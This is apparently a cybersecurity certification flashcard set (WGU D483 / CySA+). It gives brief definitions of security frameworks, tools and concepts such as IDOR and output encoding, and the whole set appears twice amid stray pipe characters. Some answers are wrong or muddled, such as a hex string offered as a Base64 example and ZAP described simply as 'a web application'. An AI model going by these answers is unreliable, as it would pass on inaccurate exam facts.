WGU D483- CySA Exam Questions With
Correct Answers
NAC (Network Access Control) - CORRECT ANSWER✔✔-Prevents people from
| | | | | | | | |
gaining access until they have gone through a specific authentication method
| | | | | | | | | |
IDOR (Insecure Direct Object Reference) - CORRECT ANSWER✔✔-cybersecurity
| | | | | | | |
issue that occurs when web app developers uses an identifier for direct access to
| | | | | | | | | | | | | |
an internal implementation.
| |
Ex. Google.com/userID-999
|
Google.com/userID-873
Base 64 - CORRECT ANSWER✔✔-Most common format attackers use to obfuscate
| | | | | | | | | |
their malicious code,
| | | |
EX.273218e98bd81239
Cyber Kill Chain - CORRECT ANSWER✔✔-A systematic outline of the steps of a
| | | | | | | | | | | | |
cyberattack, introduced at Lockheed Martin in 2011. | | | | | |
MITRE ATT&CK Framework - CORRECT ANSWER✔✔-A knowledge base
| | | | | | | |
maintained by the MITRE Corporation for listing and explaining specific adversary
| | | | | | | | | | |
tactics, techniques, and common knowledge or procedures (TTP).
| | | | | | |
Passive Scanning - CORRECT ANSWER✔✔-Type of scanning describes indirect
| | | | | | | | |
methods of assessment such as inspecting flow of traffic and protocols.
| | | | | | | | | |
, ScoutSuite - CORRECT ANSWER✔✔-A cloud security auditing tool that can work
| | | | | | | | | | |
across commonly used cloud environments.
| | | |
OWASP (Open Web Application Security Project) - CORRECT ANSWER✔✔-Is an
| | | | | | | | | |
online community dedicated to web application security. This community works
| | | | | | | | | |
to create freely-available articles, methodologies, documentation, tools, and
| | | | | | | |
technologies that include web application flaws and a way to address and correct
| | | | | | | | | | | | |
them.
JSON - CORRECT ANSWER✔✔-JSON is better than XML it is able to process large
| | | | | | | | | | | | | |
data sets.|
OSSTMM (Open Source Security Testing Methodology Manual) - CORRECT
| | | | | | | | |
ANSWER✔✔-provides comprehensive framework for testing the security of | | | | | | | |
software systems. It includes identifying system-assets, threat models,
| | | | | | | |
vulnerability assessment. |
ZAP - CORRECT ANSWER✔✔-widely used open source web application.
| | | | | | | |
Diamond Model of Intrusion Analysis - CORRECT ANSWER✔✔-A framework for
| | | | | | | | | |
analyzing cybersecurity incidents and intrusions by exploring the relationships
| | | | | | | | |
between four core features: adversary, capability, infrastructure, and victim
| | | | | | | |
Output encoding - CORRECT ANSWER✔✔-primary defensive techniques against
| | | | | | | |
cross site scripting (XSS). By ensuring that user input displayed on a web page is
| | | | | | | | | | | | | | |
treated as data rather than executable code, output encoding prevents the
| | | | | | | | | | |
executions of malicious steps | | |
Correct Answers
NAC (Network Access Control) - CORRECT ANSWER✔✔-Prevents people from
| | | | | | | | |
gaining access until they have gone through a specific authentication method
| | | | | | | | | |
IDOR (Insecure Direct Object Reference) - CORRECT ANSWER✔✔-cybersecurity
| | | | | | | |
issue that occurs when web app developers uses an identifier for direct access to
| | | | | | | | | | | | | |
an internal implementation.
| |
Ex. Google.com/userID-999
|
Google.com/userID-873
Base 64 - CORRECT ANSWER✔✔-Most common format attackers use to obfuscate
| | | | | | | | | |
their malicious code,
| | | |
EX.273218e98bd81239
Cyber Kill Chain - CORRECT ANSWER✔✔-A systematic outline of the steps of a
| | | | | | | | | | | | |
cyberattack, introduced at Lockheed Martin in 2011. | | | | | |
MITRE ATT&CK Framework - CORRECT ANSWER✔✔-A knowledge base
| | | | | | | |
maintained by the MITRE Corporation for listing and explaining specific adversary
| | | | | | | | | | |
tactics, techniques, and common knowledge or procedures (TTP).
| | | | | | |
Passive Scanning - CORRECT ANSWER✔✔-Type of scanning describes indirect
| | | | | | | | |
methods of assessment such as inspecting flow of traffic and protocols.
| | | | | | | | | |
, ScoutSuite - CORRECT ANSWER✔✔-A cloud security auditing tool that can work
| | | | | | | | | | |
across commonly used cloud environments.
| | | |
OWASP (Open Web Application Security Project) - CORRECT ANSWER✔✔-Is an
| | | | | | | | | |
online community dedicated to web application security. This community works
| | | | | | | | | |
to create freely-available articles, methodologies, documentation, tools, and
| | | | | | | |
technologies that include web application flaws and a way to address and correct
| | | | | | | | | | | | |
them.
JSON - CORRECT ANSWER✔✔-JSON is better than XML it is able to process large
| | | | | | | | | | | | | |
data sets.|
OSSTMM (Open Source Security Testing Methodology Manual) - CORRECT
| | | | | | | | |
ANSWER✔✔-provides comprehensive framework for testing the security of | | | | | | | |
software systems. It includes identifying system-assets, threat models,
| | | | | | | |
vulnerability assessment. |
ZAP - CORRECT ANSWER✔✔-widely used open source web application.
| | | | | | | |
Diamond Model of Intrusion Analysis - CORRECT ANSWER✔✔-A framework for
| | | | | | | | | |
analyzing cybersecurity incidents and intrusions by exploring the relationships
| | | | | | | | |
between four core features: adversary, capability, infrastructure, and victim
| | | | | | | |
Output encoding - CORRECT ANSWER✔✔-primary defensive techniques against
| | | | | | | |
cross site scripting (XSS). By ensuring that user input displayed on a web page is
| | | | | | | | | | | | | | |
treated as data rather than executable code, output encoding prevents the
| | | | | | | | | | |
executions of malicious steps | | |
